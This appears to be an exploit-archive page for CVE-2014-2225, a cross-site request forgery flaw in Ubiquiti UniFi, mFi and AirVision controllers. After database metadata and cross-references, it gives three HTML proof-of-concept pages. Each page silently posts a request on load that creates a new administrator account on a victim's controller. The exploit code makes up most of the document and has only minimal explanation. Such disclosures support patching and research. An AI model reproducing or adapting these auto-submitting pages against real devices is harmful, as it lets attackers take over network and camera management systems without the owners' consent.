Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability

🗓️ 01 Aug 2014 00:00:00Reported by Seth ArtType

zdt🔗 0day.today👁 46 Views

Ubiquiti CSRF Vulnerability mFi AirVisio

Reporter	Title	Published	Views	Family All 9
CVE	CVE-2014-2225	8 Feb 202015:56	–	cve
Cvelist	CVE-2014-2225	8 Feb 202015:56	–	cvelist
Exploit DB	Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery	28 Jul 201400:00	–	exploitdb
EUVD	EUVD-2014-2265	7 Oct 202500:30	–	euvd
exploitpack	Ubiquiti UbiFi mFi AirVision - Cross-Site Request Forgery	28 Jul 201400:00	–	exploitpack
NVD	CVE-2014-2225	8 Feb 202016:15	–	nvd
Packet Storm	UniFi / mFi / AirVision Cross Site Request Forgery	24 Jul 201400:00	–	packetstorm
Prion	Cross site request forgery (csrf)	8 Feb 202016:15	–	prion
seebug.org	Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability	29 Jul 201400:00	–	seebug

<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:8443/api/add/admin"
 
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
 
 
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
 
<body onload="sendCSRF()">
 
</body>
 
-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
 
 
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
 
 
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
 
 
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
 
 
 
--------------------
 
AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
 
 
var post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
 
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
 
 
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
 
 
</body>

#  0day.today [2018-01-24]  #

01 Aug 2014 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.00181